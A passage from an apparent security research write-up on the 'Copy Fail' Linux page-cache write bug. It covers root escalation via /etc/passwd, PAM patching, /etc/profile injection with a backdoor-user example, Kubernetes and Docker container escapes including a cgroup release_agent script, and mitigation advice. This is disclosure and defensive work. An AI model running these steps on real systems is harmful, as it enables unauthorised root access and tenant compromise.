/etc/passwd is 0644 on all Linux distributions and is world-readable, making it a natural target.

The idea is to change the UID field of a target user from 1000 to 0000, which only requires changing one ASCII digit. Linux identifies root by UID 0.

# Before: testuser123:x:1000:1000::/home/testuser123:/bin/bash
python3 exp_passwd_uid.py testuser123
# [+] SUCCESS: UID changed to 0000 in page cache

id testuser123
# uid=0(root) gid=0(root) groups=0(root)

su - testuser123
# whoami -> root
# /etc/shadow is readable

# Restore.
echo 3 > /proc/sys/vm/drop_caches

A single four-byte write is enough for privilege escalation. No shellcode or ELF knowledge is needed, and the path is distribution-independent. Since PG_dirty is not set, drop_caches restores the original content.

5.2 PAM Authentication Bypass

pam_unix.so is the standard Linux password-authentication module and is usually 0644.

The idea is to modify the password-check path in pam_sm_authenticate: replace mov %eax,%ebp (89 c5), which saves the real return value, with xor %ebp,%ebp (31 ed), forcing the function to return PAM_SUCCESS (0):

; after password verification, save the return value
0x3d5e:  89 c5           mov  %eax, %ebp    ; original: save real verification result
; patched to:
0x3d5e:  31 ed           xor  %ebp, %ebp    ; tampered: clear to zero = PAM_SUCCESS
python3 exp_pam_bypass.py
# [*] Auto-detected patch offset: 0x3d5e
# [*] Patching to: 31ede95e (xor %ebp,%ebp)
# [+] SUCCESS: pam_unix.so patched in page cache

su root
# Password: any input
# whoami -> root

Persistence detail. Processes such as sshd, login, and sd-pam load pam_unix.so through mmap(MAP_PRIVATE). These mappings keep references to the modified page, preventing drop_caches from evicting it. During invalidate_inode_page(), the kernel sees page_mapped() and skips eviction. The modification persists until all mapping processes exit or the file's inode is replaced, for example through yum reinstall pam.

5.3 Live-Patching Shared Libraries

Linux loads .so shared libraries through mmap(MAP_PRIVATE). Processes using the same library share the same physical page-cache pages. Modifying the page cache of a .so file is equivalent to modifying the code or data section seen by all running processes that have mapped that library. x86 cache coherence makes the write immediately visible to instruction and data fetches on all cores.

The experiment uses libnss_files.so, the system NSS name-resolution library, which is 0644, and a long-running monitor process:

# Step 1: start a monitor process that keeps reading a string from its mmap mapping.
gcc -o monitor exp_shared_lib_monitor.c -ldl
./monitor &
# [monitor] PID=161045
# [monitor] initial: "/etc/hosts"
# [monitor] tick 1: no change
# [monitor] tick 2: no change

# Step 2: tamper with the .so page cache from another terminal.
python3 exp_shared_lib.py
# [+] SUCCESS: '/etc/hosts' -> '/etc/h0sts' in page cache

# Step 3: the monitor sees the change without restart.
# [monitor] tick 3: *** STRING CHANGED ***
# [monitor] now: "/etc/h0sts"
# [monitor] *** LIVE-PATCH CONFIRMED (no restart) ***

The key evidence is that monitor process PID 161045 never restarts. It reads the original value during ticks 1 and 2, then immediately sees the modified string at tick 3 after the PoC runs.

On CentOS 8, more than twenty system daemons, including sshd, crond, dockerd, and dbus-daemon, hold mmap references to libnss_files.so. drop_caches cannot evict the modified page. The modification remains semi-persistent while the system is running, and recovery requires replacing the file, for example with yum reinstall glibc-common.

Risk note

Modifying the code section of core system libraries such as libc.so can theoretically lead to arbitrary code execution in root daemons that call the modified function, but it carries a high risk of crashing the system. The experiment above only modified a string in the .rodata section as a safer validation.

5.4 /etc/profile Command Injection

/etc/profile is 0644 on Linux distributions and is automatically sourced by every login shell, including SSH login, su -, and console login.

The idea is to use an existing comment line as cover. The injected command overwrites part of the comment, and the remaining original text is commented out by #, leaving the rest of the file functional:

# Original: # It's NOT a good idea to change this file unless you know what you
# Injected: id>>/tmp/CF-PWNED  #ea to change this file unless you know what you
#           command part       '#' comments out the remaining text
python3 exp_profile_inject.py "id>>/tmp/CF-PWNED  #"
# [*] Payload: 20 bytes, 5 writes
# [+] SUCCESS: command injected into /etc/profile

# Trigger: root starts a login shell.
su - root -c "echo triggered"

cat /tmp/CF-PWNED
# uid=0(root) gid=0(root) groups=0(root)

Only five writes, twenty bytes total, are needed. This path is highly portable because every distribution has /etc/profile, and it usually contains comment lines. A real attack could inject a reverse shell or a backdoor-user creation command, for example useradd -o -u0 backdoor #.

5.5 Tampering Scheduled-Task Scripts

Cron jobs and systemd services often reference scripts or binaries that are world-readable. They are passive targets: after tampering, the attacker only waits for the daemon's next scheduled execution.

# Setup: a cron job runs /tmp/copyfail-lab/cron_target.sh every minute.
# Script content: echo "ORIGINAL $(date +%s)" >> cron.log

# Tamper with the script page cache.
python3 exp_cron_script.py /tmp/copyfail-lab/cron_target.sh
# [+] SUCCESS: script tampered in page cache ("ORIGINAL" -> "HIJACKED")

# Next cron trigger, within one minute:
tail /tmp/copyfail-lab/cron.log
# HIJACKED 1778309461   <- crond executed the tampered script

crond rereads the script file each time it triggers the job, so it naturally consumes the tampered page-cache data. The same applies to service scripts referenced by systemd.

Configuration files versus script files

Directly modifying cron configuration files in /etc/cron.d/ or systemd unit files in page cache is technically possible, but it is not practical in real attacks. cronie uses inotify to detect configuration changes, and page-cache modification does not trigger inotify. crond must restart to read the change. Systemd unit-file changes also require systemctl daemon-reload or a service restart. A low-privilege attacker cannot normally force these daemon operations. Practical attack paths are limited to scripts or binaries already referenced by existing jobs.

5.6 /etc/ld.so.preload Path Hijack

Shared libraries listed in /etc/ld.so.preload are loaded by the dynamic linker before normal libraries for every newly started program. Modifying a listed path gives global code injection.

# Precondition: /etc/ld.so.preload already exists, for example for performance monitoring.
cat /etc/ld.so.preload
# /tmp/copyfail-lab/libmarker.so

python3 exp_preload_hijack.py
# [+] SUCCESS: preload path hijacked
# /tmp/copyfail-lab/libmarker.so -> /tmp/copyfail-lab/libevil00.so

ls /dev/null
# [preload] EVIL LIBRARY LOADED!   <- malicious library loaded by every new process
# /dev/null

Precondition: /etc/ld.so.preload must already exist. Copy Fail cannot create new files; it can only modify the page cache of existing files. The file is absent by default, but it commonly appears in environments using jemalloc preloading, LD_PRELOAD security agents, or performance-monitoring tools.


6. Deep Dive into Container Scenarios

The previous section covered several host-side privilege-escalation paths. In containerized infrastructure, the threat goes further: Page Cache is global shared state that crosses container isolation boundaries. After disclosure, multiple security teams quickly examined container and Kubernetes environments. The results showed that PSS Restricted and RuntimeDefault do not block AF_ALG, production EKS clusters can reproduce the issue end to end, and a privileged DaemonSet that shares an image layer can be abused for Pod-to-Node escape. This section independently validates and extends those findings, focusing on practical exploitability boundaries.

All conclusions below were experimentally verified on a real Kubernetes cluster: k3s v1.32 with containerd v2.0.5, running CentOS Stream 8 with an unpatched 4.18.0-553 kernel.

Container experiment code

The Pod YAML files, PoC scripts, and validation tools are in the container experiment package. URL links have been removed from this blog version.

6.1 Image-Layer Sharing: Cross-Container Page-Cache Propagation

Container runtimes such as containerd and Docker use overlayfs to manage container filesystems. For the same base image, such as python:3.11-slim, the image layers are stored once on the host. All containers using that image have lower layers pointing to the same set of inodes.

This means that when container A reads /usr/bin/python3, the kernel creates a page-cache entry for that inode. When container B later reads the same file, it hits the exact same page-cache page.

One important boundary must be emphasized: Page Cache is global at kernel level, but its scope is one machine. Only containers on the same node can share overlayfs layers that point to the same inodes and therefore share page-cache pages. Containers on different nodes have independent page caches, even if they use the same image. This same-node condition is the fundamental prerequisite for all cross-container attack scenarios below.

Overlayfs layer sharing mechanism

Experiment: Cross-Container Page-Cache Sharing

Deploy the experiment and verify inode sharing:

# Deploy two Pods using the same base image.
kubectl create ns copyfail-lab
kubectl apply -f pod-cross-tenant.yaml

# Verify that both Pods share the same /etc/os-release inode.
kubectl exec -n copyfail-lab pod-attacker -- stat -c '%i' /etc/os-release
# 208483846
kubectl exec -n copyfail-lab pod-victim-same -- stat -c '%i' /etc/os-release
# 208483846    <- same inode = shared page cache

Run the page-cache write inside the attacker Pod:

# Run the PoC in the attacker Pod.
kubectl exec -n copyfail-lab pod-attacker -- python3 /poc_marker.py /etc/os-release
# [*] Target: /etc/os-release
# [*] Before: 50524554
# [*] After:  deadbeef
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef

# Victim Pod using the same base image immediately sees the tampered bytes.
kubectl exec -n copyfail-lab pod-victim-same -- \
  python3 -c "import os; print(os.pread(os.open('/etc/os-release',0),16,0).hex())"
# deadbeef54595f4e414d453d22446562
# [+] MARKER FOUND: page cache is SHARED with attacker pod!

# Control group using a different base image is unaffected.
kubectl exec -n copyfail-lab pod-victim-alpine -- head -c 16 /etc/os-release | xxd
# 00000000: 4e41 4d45 3d22 416c 7069 6e65  NAME="Alpine

Reading the corresponding file directly from the containerd snapshot directory on the host shows the same tampered data:

# Host reads the snapshot-layer file.
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb

# drop_caches restores it.
echo 3 > /proc/sys/vm/drop_caches
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562  PRETTY_NAME="Deb

6.2 Zero-Privilege Cross-Tenant Attack

Zero-privilege cross-tenant attack

Based on the sharing mechanism above, we can validate a zero-privilege cross-tenant attack where attacker and victim run in completely separate namespaces:

# Create two isolated namespaces.
kubectl create ns copyfail-lab      # attacker
kubectl create ns tenant-victim     # victim

# Deploy the Pods. See pod-cross-tenant.yaml in the experiment package.
kubectl apply -f pod-cross-tenant.yaml

Prerequisite validation: confirm inode sharing

# Two Pods in different namespaces, same base image -> same inode.
kubectl exec -n copyfail-lab pod-attacker -- stat -c '%i' /bin/cat
# 1420102
kubectl exec -n tenant-victim victim-app -- stat -c '%i' /bin/cat
# 1420102    <- same inode, even across namespaces

Attack execution

# Step 1: verify that the victim's /bin/cat is normal.
kubectl exec -n tenant-victim victim-app -- \
  python3 -c "import os; print(os.pread(os.open('/bin/cat',0),16,0).hex())"
# 7f454c46020101000000000000000000  (normal ELF header)

# Step 2: attacker runs Copy Fail without any special privilege.
kubectl exec -n copyfail-lab pod-attacker -- python3 /poc_marker.py /bin/cat
# [*] Before: 7f454c46
# [*] After:  deadbeef
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef

# Step 3: victim immediately sees the effect.
kubectl exec -n tenant-victim victim-app -- \
  python3 -c "import os; print(os.pread(os.open('/bin/cat',0),16,0).hex())"
# deadbeef020101000000000000000000
# ELF magic is corrupted.

# Step 4: victim service breaks.
kubectl exec -n tenant-victim victim-app -- cat /etc/hostname
# exec /usr/bin/cat: exec format error    <- binary cannot execute

# Step 5: restore from the host.
echo 3 > /proc/sys/vm/drop_caches
kubectl exec -n tenant-victim victim-app -- cat /etc/hostname
# victim-app    <- normal again

The key conclusion is that this attack requires no special capability, no hostPath mount, and no relaxed security context. The only prerequisites are an unpatched kernel and the ability to execute Python, or an equivalent C program, inside the container. The two Pods do not need network connectivity and do not need to know each other's IP address or name.

The experiment above corrupted a file used by a normal user Pod, so the impact is limited to cross-tenant denial of service. The natural next question is whether the same mechanism can be turned into a container escape: can a zero-privilege Pod obtain node-level control?

The answer depends on the target. From Section 6.1, page-cache tampering has two prerequisites: the attacker and the target container must be on the same node, and they must share at least one image layer. If the target container runs with privileged: true, then when a tampered binary executes inside it, the attacker's payload runs with full node-level privileges.

A DaemonSet is the natural candidate for satisfying both conditions. A DaemonSet runs one Pod replica on every node. No matter where the compromised Pod is scheduled, a DaemonSet instance is present on the same node. Kubernetes clusters often run privileged system DaemonSets such as kube-proxy, CNI plugins, and log collectors.

This likely explains why one public PoC selected kube-proxy as the target. In managed clusters such as ACK, EKS, and GKE, kube-proxy commonly runs as a privileged DaemonSet. That PoC tampers with the page cache of the ipset binary inside kube-proxy and waits for kube-proxy to execute it. To make the sharing deterministic, the attacker image is built with FROM registry.k8s.io/kube-proxy:v1.35.2, guaranteeing a shared image layer that contains ipset.

Finding Exploitable Targets: Layer-Sharing Analysis on a Node

Using FROM to match the target image makes the exploit deterministic. To evaluate exposure in a real environment, namely whether a normal business Pod naturally shares a layer with a privileged DaemonSet on the same node, analyze the node as follows:

# 1. List all privileged containers and their images on the node.
crictl ps -o json | jq -r '.containers[] | "\(.id) \(.image.image) \(.metadata.name)"'

# 2. Compare layer digests between the business Pod image and the target DaemonSet image.
MY_IMAGE="python:3.11-slim"
TARGET_IMAGE="registry.k8s.io/kube-proxy:v1.35.2"

crictl inspecti $MY_IMAGE | jq -r '.info.imageSpec.rootfs.diff_ids[]' > /tmp/my_layers.txt
crictl inspecti $TARGET_IMAGE | jq -r '.info.imageSpec.rootfs.diff_ids[]' > /tmp/target_layers.txt
comm -12 <(sort /tmp/my_layers.txt) <(sort /tmp/target_layers.txt)
# Any output means a shared layer exists.

# 3. Confirm whether the target file is actually shared by both containers.
# Run this inside both containers.
stat -c '%d:%i' /usr/sbin/ipset    # device:inode
# Same output in both containers confirms page-cache sharing.

If the shared object is a base library such as ld-linux-x86-64.so.2 or libc.so.6, the theoretical attack surface is larger because every binary loads it. In practice, replacing a whole .so file requires overwriting every four-byte window and is slow. If any process loads the .so during partial overwrite, it can crash. Core libraries are depended on by many processes, so tampering with libc.so.6 is more likely to cause widespread container crashes than stable code execution.

Challenges in Real Attacks

The analysis above requires node-level visibility through crictl and direct access to containerd storage. In a real attack, an attacker usually obtains only a shell inside a normal Pod through RCE. They cannot directly see which containers run on the same node, which images they use, or whether layer digests match. This means the attacker cannot complete the analysis in the target environment and must rely on inference or blind attempts.

Blindly trying Copy Fail against files in the target environment is a poor strategy. Each four-byte overwrite is irreversible unless an administrator drops the cache. If the guessed target file or layer-sharing relation is wrong, the attacker only corrupts a binary inside the compromised container. That may expose the intrusion or crash the container and lose the foothold.

A more realistic exploitation model is targeted exploitation against a known business environment. Once the attacker compromises a container, the application itself reveals the framework, middleware, base-image family, and version. The attacker can reproduce a similar environment locally with the same image and Kubernetes distribution, perform white-box analysis, identify privileged containers, confirm layer sharing, locate an exploitable shared file, and debug the payload. They then return to the target environment with a deterministic one-shot exploit.

6.3 Can It Escape Directly to the Host?

The previous section discussed cross-container escalation: tampering with a binary used by a privileged DaemonSet to indirectly obtain node privileges. That depends on shared layers and later execution inside the target container. A more aggressive question is whether we can skip the intermediate container entirely and make a host process execute tampered page-cache data directly.

Copy Fail can tamper with the page cache of any readable file, but data tampering alone is not enough. A host process must load and execute the tampered data in its own privilege context. A plain read() is not an escape. The read data must be used as code, for example through execve(), dlopen(), or an interpreter that jumps into parsed content.

First, however, we need to answer a simpler question: if a host process accesses a file whose page cache was tampered with, does it load original disk content or tampered page-cache content?

The answer is the latter. Page Cache is a global transparent cache for file I/O. Both read() and execve() load file content through the page cache, for example through filemap_read and readahead. If the page for an inode already exists in page cache, the kernel returns the cached data and does not reread disk. This behavior is independent of the namespace of the process accessing the file.

The experiment in Section 6.1 provides direct evidence. After tampering with /etc/os-release from inside a container:

# The host reads the same inode through the snapshot path and sees the tampered data.
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb

# drop_caches forces eviction and the kernel reloads from disk.
echo 3 > /proc/sys/vm/drop_caches
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562  PRETTY_NAME="Deb

The before-and-after comparison shows that the host read page-cache content rather than disk content. The same applies to execve(). In the hostPath experiment in Section 6.4, after a container tampers with the page cache of /usr/bin/ls, the host's execution of ls returns exit 126 with exec format error. That proves execve() loaded the tampered ELF header from page cache.

Therefore, page-cache tampering is globally visible to the host and affects both read() and execve(). The real question is whether, in the standard container lifecycle, host processes actively access file inodes from container snapshot layers. There are two candidate scenarios:

  1. Whether the container runtime, such as containerd and runc, executes or dlopen()s files from a container snapshot layer in the host context during container creation or startup.
  2. Whether other host tools, such as EDR or compliance scanners, execute binaries, load .so files, or interpret scripts from container layers.

For scenario 1, bpftrace was used to trace runc and containerd during container startup:

# Trace the mount namespace used by runc init when it reads files.
bpftrace -e '
kprobe:vfs_read /comm == "runc:[2:INIT]"/ {
    $task = (struct task_struct *)curtask;
    $mntns = $task->nsproxy->mnt_ns->ns.inum;
    printf("runc-init vfs_read mntns=%u file=%s\n",
           $mntns, str(((struct file *)arg0)->f_path.dentry->d_name.name));
}' &

# Trigger container creation.
kubectl run test-probe --image=python:3.11-slim --restart=Never -- sleep 10

# Output:
# runc-init vfs_read mntns=4026533841 file=passwd
# runc-init vfs_read mntns=4026533841 file=group
# mntns is not the host namespace (4026531840), so runc is already inside the container namespace.
# Trace vfs_read in the containerd process.
bpftrace -e '
kprobe:vfs_read /comm == "containerd"/ {
    printf("containerd vfs_read: %s\n",
           str(((struct file *)arg0)->f_path.dentry->d_name.name));
}' -- 60   # monitor for 60 seconds while creating and deleting containers

# Result: only config.json, meta.db, and similar metadata files appear.
# It never reads /bin/*, /etc/*, or other user files from snapshot layers.

The containerd trace confirms the same conclusion: it operates on metadata such as config.json and meta.db, and does not read or execute user files from snapshot layers.

Scenario 2 is environment-specific. Whether a host-side tool executes or loads files from container-layer paths depends on the software deployed on that node. It is not a universal condition and is not tested as a general escape path here, though such behavior could exist in specific environments.

Conclusion: in a standard Kubernetes environment using containerd, a generic zero-privilege container-to-host direct escape is architecturally infeasible. The runtime design ensures that runc's operations on the container rootfs occur after switching to the container mount namespace, while containerd does not touch user data inside snapshot layers. If a non-standard host service loads and executes files from container-layer paths, that can create an environment-specific escape vector. Docker has architectural differences and is discussed separately in Section 6.5.

6.4 Privileged Configurations and Container Escape

A zero-privilege direct escape is not practical, but if a container has certain privileged configurations, Copy Fail can become the missing final piece that turns read access into host-file tampering. The following cases were systematically verified.

hostPath readOnly plus Copy Fail: Bypassing Read-Only Restrictions

Kubernetes hostPath volumes are often configured with readOnly: true to prevent containers from modifying host files. Copy Fail bypasses that assumption through the page cache:

# Pod configuration. See pod-hostpath-escape.yaml in the experiment package.
volumes:
- name: host-bin
  hostPath:
    path: /usr/bin
    type: Directory
volumeMounts:
- name: host-bin
  mountPath: /hostbin
  readOnly: true    # looks safe
# Confirm the mount is read-only.
kubectl exec -n copyfail-lab hostpath-test -- mount | grep hostbin
# /dev/mapper/cl-root on /hostbin type xfs (ro,relatime,...)

# Normal write is denied.
kubectl exec -n copyfail-lab hostpath-test -- touch /hostbin/test
# touch: cannot touch '/hostbin/test': Read-only file system

# Copy Fail bypasses the read-only restriction.
kubectl exec -n copyfail-lab hostpath-test -- python3 /poc_marker.py /hostbin/ls
# [*] Before: 7f454c46
# [*] After:  deadbeef
# [+] SUCCESS: page cache corrupted!

# Host verification.
ls
# bash: /usr/bin/ls: cannot execute binary file: Exec format error
# Exit code: 126

This is the most distinctive value of Copy Fail: it turns an O_RDONLY file descriptor into a writable attack surface. The common assumption is that a read-only mount at least prevents file tampering. Copy Fail breaks that assumption.

CAP_DAC_READ_SEARCH plus Copy Fail: Upgraded Shocker

CAP_DAC_READ_SEARCH allows a process to bypass file and directory read-permission checks. The classic Shocker attack uses open_by_handle_at() with this capability to obtain file descriptors for the host filesystem. Original Shocker only allowed reading host files.

With Copy Fail, the chain becomes:

# Deploy a container with CAP_DAC_READ_SEARCH.
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: shocker-test
  namespace: copyfail-lab
spec:
  containers:
  - name: test
    image: python:3.11-slim
    command: ["sleep", "infinity"]
    securityContext:
      capabilities:
        add: ["DAC_READ_SEARCH"]
EOF

Attack process, executed inside the container:

kubectl exec -n copyfail-lab shocker-test -- python3 -c "
import os, struct, ctypes
# 1. Shocker: use open_by_handle_at() to obtain a host-root fd.
libc = ctypes.CDLL('libc.so.6', use_errno=True)
# ... construct root inode handle and call open_by_handle_at
# 2. Use openat() to open host /usr/bin/cat. Read-only is enough.
# 3. Use Copy Fail to tamper with the page cache.
"
# Experiment output:
# [1] Host root fd: 4
# [+] Host / contents: ['.autorelabel', 'bin', 'boot', 'dev', 'etc', ...]
# [2] Host /usr/bin/cat fd: 7
# [3] Before: 7f454c46020101000000000000000000
# [4] After:  deadbeef020101000000000000000000
# [+] SUCCESS: Host /usr/bin/cat corrupted via Shocker + Copy Fail!

CAP_SYS_ADMIN plus Copy Fail: cgroup release_agent Escape

# Deploy a container with CAP_SYS_ADMIN.
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: sysadmin-test
  namespace: copyfail-lab
spec:
  containers:
  - name: test
    image: python:3.11-slim
    command: ["sleep", "infinity"]
    securityContext:
      capabilities:
        add: ["SYS_ADMIN"]
EOF

Use cgroup v1 release_agent inside the container:

kubectl exec -n copyfail-lab sysadmin-test -- bash -c '
# Mount a cgroup subsystem.
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x

# Confirm release_agent is writable.
echo 1 > /tmp/cgrp/x/notify_on_release
# Set release_agent to a script path in the container upperdir.
host_path=$(sed -n "s/.*upperdir=\([^,]*\).*/\1/p" /proc/self/mountinfo)
echo "$host_path/cmd" > /tmp/cgrp/release_agent

# Write the escape command.
echo "#!/bin/sh" > /cmd
echo "id > /tmp/cgrp/output; hostname >> /tmp/cgrp/output" >> /cmd
chmod +x /cmd

# Trigger.
echo $$ > /tmp/cgrp/x/cgroup.procs
sleep 1 && echo 0 > /tmp/cgrp/x/cgroup.procs
sleep 1 && cat /tmp/cgrp/output
'
# uid=0(root) gid=0(root) groups=0(root)
# your-hostname
# The host executed the command as root.

hostPID plus CAP_SYS_PTRACE plus Copy Fail

When a container shares the host PID namespace and has CAP_SYS_PTRACE, it can access the host filesystem root through /proc/1/root/. Combined with Copy Fail's page-cache write, this can tamper with host files.

# Obtain a host-file fd through /proc/1/root/ and use Copy Fail to tamper with it.
kubectl exec -n copyfail-lab hostpid-test -- python3 -c "
import os
fd = os.open('/proc/1/root/usr/bin/cat', os.O_RDONLY)
# ... page_cache_write_4bytes(fd, 0, b'\xde\xad\xbe\xef')
"

Summary

Privileged configuration Escape by itself With Copy Fail
hostPath readOnly No, read-only Yes, bypass read-only and tamper with host files
CAP_DAC_READ_SEARCH No, read-only Yes, Shocker read becomes read/write
CAP_SYS_ADMIN Yes, known path Yes, cgroup release_agent
hostPID plus SYS_PTRACE Yes, known path Yes, tamper through /proc/1/root/
hostPID alone No No
SYS_PTRACE alone No No
NET_ADMIN, hostNetwork, hostIPC No No

6.5 Docker Environment

The previous analysis focused on Kubernetes with containerd. Docker shares the same underlying mechanisms: overlayfs layer sharing and global page-cache behavior. Therefore, cross-container page-cache sharing, read-only volume bypass with -v path:ro, and Shocker upgrade with --cap-add DAC_READ_SEARCH also work in Docker. I verified this on Docker 26.1.3 with overlay2 on XFS. The reproduction is essentially the same: replace kubectl exec with docker exec, and replace readOnly: true with -v path:ro.

This section focuses on Docker-specific architectural differences.

dockerd Architectural Difference

Section 6.3 showed that containerd in a Kubernetes environment only traverses metadata and does not read file data from snapshot layers. Docker's dockerd is different. As a monolithic daemon, management APIs such as docker export, docker commit, and docker cp read full file content from the container overlay filesystem with host privileges. If the page cache is already tampered with, these operations read the tampered bytes.

This behavior is not unique to Copy Fail. If a container directly writes a file, docker commit or docker export will also include the change. The unique value of Copy Fail appears in the next section: stealth.

docker export versus docker commit: Persistence Difference

The two operations treat Copy Fail tampering very differently.

docker export: persistent. It flattens the entire container filesystem into a tar archive and reads file contents one by one. Tampered page-cache bytes written into the tar become permanent and no longer depend on the page-cache lifecycle:

docker run -d --name copyfail-test python:3.11-slim sleep infinity
docker cp poc_marker.py copyfail-test:/poc_marker.py
docker exec copyfail-test python3 /poc_marker.py /usr/lib/os-release
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef

# Export while page cache is tampered; the tar records the tampered data.
docker export copyfail-test > tainted.tar
tar xf tainted.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb

# Export again after drop_caches; the new tar has original data.
echo 3 > /proc/sys/vm/drop_caches
docker export copyfail-test > clean.tar
tar xf clean.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562  PRETTY_NAME="Deb

# Key point: the first tar remains permanently tainted even after page cache is cleared.
tar xf tainted.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb

If this tar is used with docker import to build a new image or is distributed to another environment, the tampering becomes a supply-chain artifact.

docker commit: not persistent. It creates a new image layer but only records upper-layer changes. Lower layers are shared by reference; their file data is not copied into the new layer. Therefore, lower-layer files in the committed image are still read dynamically from page cache or disk:

# Tamper with page cache again.
docker exec copyfail-test python3 /poc_marker.py /usr/lib/os-release

# Commit and start a container from the new image; it sees tampered data from page cache.
docker commit copyfail-test copyfail-committed:test
docker run --rm copyfail-committed:test head -c 20 /usr/lib/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb

# After drop_caches, it sees original data reloaded from disk.
echo 3 > /proc/sys/vm/drop_caches
docker run --rm copyfail-committed:test head -c 20 /usr/lib/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562  PRETTY_NAME="Deb

Stealth: Blind Spots in Layered Detection

The previous section showed that docker export can persist tampered data, but directly writing a file inside the container and exporting it can do the same. Copy Fail's unique value is that tampering happens in the page cache of the lower layer and does not trigger overlayfs Copy-on-Write, so Docker's layered detection mechanisms fail.

1. Invisible to docker diff

docker diff copyfail-test
# A /poc_marker.py          <- only upper-layer additions
# C /usr/local/lib/...      <- Python cache files
#                            /usr/lib/os-release does not appear

docker diff only checks upper-layer changes. A direct file write triggers CoW into the upper layer and is immediately visible. Copy Fail modifies page cache only, so docker diff sees nothing.

2. The overlay2 layer path is also "polluted"

LAYER=$(docker inspect copyfail-test --format '{{.GraphDriver.Data.LowerDir}}' \
        | tr ':' '\n' | xargs -I{} sh -c 'test -f {}/usr/lib/os-release && echo {}' | head -1)

head -c 16 "$LAYER/usr/lib/os-release" | xxd -p
# deadbeef54595f4e414d453d22446562    <- host read of layer path returns page-cache data

echo 3 > /proc/sys/vm/drop_caches
head -c 16 "$LAYER/usr/lib/os-release" | xxd -p
# 5052455454595f4e414d453d22446562    <- original data appears only after drop_caches

The layer-path file and the file inside the container share the same inode, and both go through the page cache. Any host-side tool that reads through the kernel filesystem path, such as sha256sum, cat, or a file-integrity scanner, reads the tampered data while the page cache is poisoned. It cannot distinguish real disk content from tampered page-cache content.

3. Image layer digest is unchanged

The compressed image-layer blobs listed in docker image inspect under RootFS.Layers are unaffected. They are independent tar.gz files and are different inodes from the files extracted under overlay2. Image scanners such as Trivy or Snyk usually analyze these layer blobs, so scanning the original image does not detect Copy Fail tampering.

Comparison

Dimension Copy Fail tampering Direct file modification
Visible to docker diff No, lower-layer page cache only Yes, upper-layer CoW
Persisted by docker export Yes, tampered bytes are written to tar Yes
Persisted by docker commit No, only valid while page cache is poisoned Yes, written to upper layer
Image layer digest Unchanged New layer has a new digest
Image scanning of layer blobs Not detected Detectable if the changed layer is scanned
Page-cache lifecycle Volatile; cleared by reboot or drop_caches Not applicable; written to disk

The value of Copy Fail in this scenario is not that it can do something direct writes cannot do. Its value is what it can do without being noticed: no docker diff entry, unchanged layer digest, no image-scanner finding, while docker export can still persist and distribute the tampered bytes.


7. Mitigation

The fundamental fix for Copy Fail is to upgrade the kernel (Section 7.1). If immediate upgrade is not possible, disable the vulnerable module as a temporary mitigation (Section 7.2). For container environments, additionally deploy a seccomp policy that blocks AF_ALG socket creation (Section 7.3).

Older Docker default seccomp profiles, Kubernetes RuntimeDefault, SELinux targeted policy, and sysctl settings do not mitigate this vulnerability. SELinux can block AF_ALG system-wide through a custom policy module that denies the alg_socket class, and that works for bare metal, VMs, and containers. However, it requires rules for each SELinux domain and is more complex to deploy and maintain than seccomp or module disabling.

7.1 Fundamental Fix: Upgrade the Kernel

The only complete fix is to upgrade to a kernel that includes patch a664bf3d603d. As of May 2026, the status of major distributions is summarized below:

Distribution Status Fix or mitigation Reference label
Ubuntu 18.04-25.10 Mitigation released kmod update disables algif_aead; kernel patch pending Ubuntu Blog
Ubuntu 26.04 (Resolute) Not affected Already includes the fix Ubuntu Blog
RHEL 9 Kernel fix released RHSA-2026:13565, 2026-05-04 RHSB-2026-02
RHEL 10 Kernel fix released RHSA-2026:13566, 2026-05-04 RHSB-2026-02
RHEL 8 Kernel fix released RHSA-2026:13681 for 8.8, 2026-05-05; RHSA-2026:14230 for 8.6, 2026-05-06 RHSB-2026-02
Fedora 43 Fixed kernel 6.19.12 Fedora Discussion
Debian 11/12/13 Kernel fix released DSA-6238-1, DSA-6243-1 Debian Tracker
Alpine Linux Fixed Docker 29.4.2-r0 in edge; kernel packages fixed Alpine Security
Oracle Linux 7/8/9/10 Kernel fix released ELSA-2026-50253/50254/50255, including UEK Oracle CVE
AlmaLinux / Rocky Kernel fix released ALSA-2026:A001 for 8, ALSA-2026:A002 for 9 AlmaLinux Blog
CentOS 8 Stream Live patch available KernelCare live patch CloudLinux
SUSE / openSUSE Patch released SUSE-SU-2026:1671, 2026-05-02 SUSE Response
Amazon Linux 2023 Patch released Kernel security update AWS Bulletin
Bottlerocket Patch released OS update Bottlerocket issue #4821
Arch Linux Fixed Rolling update, kernel >= 6.19.12 Arch Security

Affected kernel version ranges

The affected ranges reported by the Alpine Security Tracker are:

  • 4.14 <= kernel < 5.10.254
  • 5.11 <= kernel < 5.15.204
  • 5.16 <= kernel < 6.1.170
  • 6.2 <= kernel < 6.6.137
  • 6.7 <= kernel < 6.12.85
  • 6.13 <= kernel < 6.18.22
  • 6.19 <= kernel < 6.19.12

Check whether the current system is affected:

# 1. Check whether the kernel version is in an affected range.
uname -r

# 2. Check whether algif_aead is loadable or built in.
#    Output means loadable module; no output usually means built-in or absent.
